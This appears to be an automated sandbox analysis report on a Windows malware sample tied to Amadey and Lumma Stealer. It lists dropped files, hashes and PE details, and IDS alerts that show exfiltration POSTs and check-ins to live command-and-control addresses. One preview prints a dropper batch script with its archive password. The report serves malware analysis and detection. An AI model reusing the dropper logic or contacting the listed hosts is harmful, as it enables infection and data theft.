                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3473725
                                                                                                                                                                                                                                        Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                        MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                        SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                        SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                        SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3473725
                                                                                                                                                                                                                                        Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                        MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                        SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                        SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                        SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017353001\54326d271c.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):440
                                                                                                                                                                                                                                        Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                                                        MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                                        SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                                        SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                                        SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1827328
                                                                                                                                                                                                                                        Entropy (8bit):7.963282633529333
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:2AVavyjrvfTYx9Z+tylUcecGjcM7B68ue7KhNzw:2AkvyvfTYxTUTj77B68uRe
                                                                                                                                                                                                                                        MD5:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                        SHA1:D5FF596961CCE5F03F842CFD8F27DDE6F124E3AE
                                                                                                                                                                                                                                        SHA-256:46DB3164BEBFFC61C201FE1E086BFFE129DDFED575E6D839DDB4F9622963FB3F
                                                                                                                                                                                                                                        SHA-512:044E1F5507E92715CE9DF8BB802E83157237A2F96F39BAC3B6A444175F1160C4D82F41A0BCECF5FEAF1C919272ED7929BAEF929A8C3F07DEECEBC44B0435164A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....Pg.........."...............-...H...-....@..............................I...........`...................................................H...............H...............H...............................H.(.....H.8...........................................UPX0......-.............................UPX1..........-.....................@...UPX2..........H.....................@...4.24.UPX!.$..=g.7....Z.H......zH.I..-.3..VH.. H......................1...MZ...o"uKHcQ<.<.PE.>H..8Q.6...[.J.t..lu'.yt.r!H....y........"....9.o.m.........1ZH....g.n.....l8..0..0..!.0..|..(.(,....8.u....'~....*../.. ^.....(v...w....YR....oD.i....H.D$ ~.9..FL......\..(..<..u....I..D.I...f.AWAVVWS.eN.%0g.....x.5.2.H..>...t.H..}.9.t)L..g..f.H....>....A..Q.u.=.X..........:|...oh.?.....^......;.]uzZ..{Q.s`AF..2PQd......p..B....o...t.1.=E6...'u7.p.)<Z.,(".f....Z..a..,+.GLO,v...\=^X...
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):284
                                                                                                                                                                                                                                        Entropy (8bit):3.384341046467864
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:Q6bXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lHt1ut0:QIf2RKQ1CGAFAjzvYRQVHit0
                                                                                                                                                                                                                                        MD5:DFD88720428D038B21494ECDB7D7D7BB
                                                                                                                                                                                                                                        SHA1:43AAF4EA6BDF491F3F12EDC4B355D5DBEBD41343
                                                                                                                                                                                                                                        SHA-256:C3D314B9D0C1CCD4E51E6345282A2AE49B010C6E064B2558F99D199A08BD99B1
                                                                                                                                                                                                                                        SHA-512:95FCB2B3C12B5DC7FCDE0F8698942D267AC225BA0322936D50B8DBCAF1DDF83DE49DB99D1DA247EE9D50D3C52F4B6F15E25A3AC80F1721DEC506F20891C66DBE
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......7i]RLB.54..C.F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1017351001\e56fffc2ce.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1275904
                                                                                                                                                                                                                                        Entropy (8bit):7.9913649636274116
                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                        SSDEEP:24576:nqYNJzSEZYfL8tWC6HeBDUMCp5yiW18BR7e7r5MQkc2nylqPv:n57zSyq82H0DUHp5ljBo54HPv
                                                                                                                                                                                                                                        MD5:577CD52217DA6D7163CEA46BB01C107F
                                                                                                                                                                                                                                        SHA1:82B31CC52C538238E63BDFC22D1EA306EA0B852A
                                                                                                                                                                                                                                        SHA-256:139762E396FB930400FAB8FAAB80CB679ABBE642144261CBA24973FB23BCD728
                                                                                                                                                                                                                                        SHA-512:8ABAD4EAF2A302DFD9EAD058E8C14D996437975730125C46D034A71028921FF36FF5D157AD3671E328AC667EC8095DB19FA14A9E8EAAF1A7738AA3D0120B5474
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................x............@...........................;...........@................................. P-..............................P-.........................................................................................................................@............0..........................@................0...0..................@............@... ..."...F..............@.............'..`.......h..............@....data....`...P-..V..."..............@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):350
                                                                                                                                                                                                                                        Entropy (8bit):5.0682682106683945
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:AMMyS3pt+uoQcAxXF2SaioBQypHSTgqF1AivwtHgNmtQFfpap1tNjtv:pMpDh5RwXSTgqFyYwzuJA1tNp
                                                                                                                                                                                                                                        MD5:2F644B7E25627553C5731B735473C859
                                                                                                                                                                                                                                        SHA1:5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
                                                                                                                                                                                                                                        SHA-256:2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
                                                                                                                                                                                                                                        SHA-512:E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..
                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):6.604000270845258
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                        File name:file.exe
                                                                                                                                                                                                                                        File size:2'976'768 bytes
                                                                                                                                                                                                                                        MD5:61cb850896f4b6aac18c72e82eb9ac90
                                                                                                                                                                                                                                        SHA1:c1fcdd242b13e4c5ad99f7e76da886288622b6dc
                                                                                                                                                                                                                                        SHA256:c2bee3616cf5c0f19ecc5738ee39a8c3d0d0523c2178177b86563d5a3d758d0f
                                                                                                                                                                                                                                        SHA512:d156751d3d9e353a116e55cbc9a9e87da03a4d29efe529344ce996324ec361f0472724bb8162c2be7ea6f291aaf2f7cbbc8659672777e182e40283fa661a2043
                                                                                                                                                                                                                                        SSDEEP:49152:nZNt60MWKf4ZmSXyOQqcxSdj04drGcnaj0GpmeogTOpGg:nZNt66Kf4Zm4yOraSd44ZGEaoGpkzGg
                                                                                                                                                                                                                                        TLSH:89D54C627609B2CBD88A17749927CDA2DE5D83F80B2008C3EC6C74BA7D63CD517B9D25
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................
                                                                                                                                                                                                                                        Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                        Entrypoint:0x711000
                                                                                                                                                                                                                                        Entrypoint Section:.taggant
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        jmp 00007F6848F7AAEAh
                                                                                                                                                                                                                                        cmovp ebp, dword ptr [00000000h]
                                                                                                                                                                                                                                        add cl, ch
                                                                                                                                                                                                                                        add byte ptr [eax], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [esi], al
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edi], bl
                                                                                                                                                                                                                                        add byte ptr [eax+000000FEh], ah
                                                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], cl
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        push es
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax+00000000h], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [ecx], cl
                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        push es
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edi], bh
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        push es
                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], dl
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [edx+ecx], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        add dword ptr [eax+00000000h], eax
                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x5d4.rsrc
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x30ff9c0x10qnusxmvo
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x30ff4c0x18qnusxmvo
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                        0x10000x680000x2de001b7655edf533e5493dcf5e200c2739faFalse0.9983555432561307data7.987026021929319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .rsrc0x690000x5d40x6001e55db351164df1643ae87d7efa3ee0fFalse0.4303385416666667data5.417125179370491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        qnusxmvo0x6b0000x2a50000x2a5000c71f308961f84b1ce013201d43918196unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        fqlahttk0x3100000x10000x400ff0fbabcc738308133540e0afdc0ffb4False0.806640625data6.251950286569563IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        .taggant0x3110000x30000x2200a13cf19aecf2d3917d342f69d097e0c8False0.0661764705882353DOS executable (COM)0.8449225260275846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                        RT_MANIFEST0x690700x3e4XML 1.0 document, ASCII text0.48092369477911645
                                                                                                                                                                                                                                        RT_MANIFEST0x694540x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                        2024-12-19T06:09:05.500049+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449748185.215.113.4380TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:11.525019+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44976331.41.244.1180TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:15.968924+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.449754TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:18.929929+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449777185.215.113.4380TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:20.397213+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44978731.41.244.1180TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:29.022935+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449802185.215.113.4380TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:35.500138+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44982331.41.244.1180TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:39.398379+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449832185.215.113.4380TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:41.147923+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44983831.41.244.1180TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:48.309941+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449854185.215.113.4380TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:49.770079+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44986031.41.244.1180TCP
                                                                                                                                                                                                                                        2024-12-19T06:09:59.035230+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.4543691.1.1.153UDP
                                                                                                                                                                                                                                        2024-12-19T06:10:00.503455+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.449888185.215.113.4380TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:00.598029+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449889104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:00.598029+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449889104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:01.388588+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449889104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:01.388588+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449889104.21.66.85443TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:01.955788+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44989231.41.244.1180TCP
                                                                                                                                                                                                                                        2024-12-19T06:10:02.629214+01002058355ET MALWARE Observed Win32/Lumma Stealer Related Domain (aspecteirs .lat in TLS SNI)1192.168.2.449896104.21.66.85443TCP
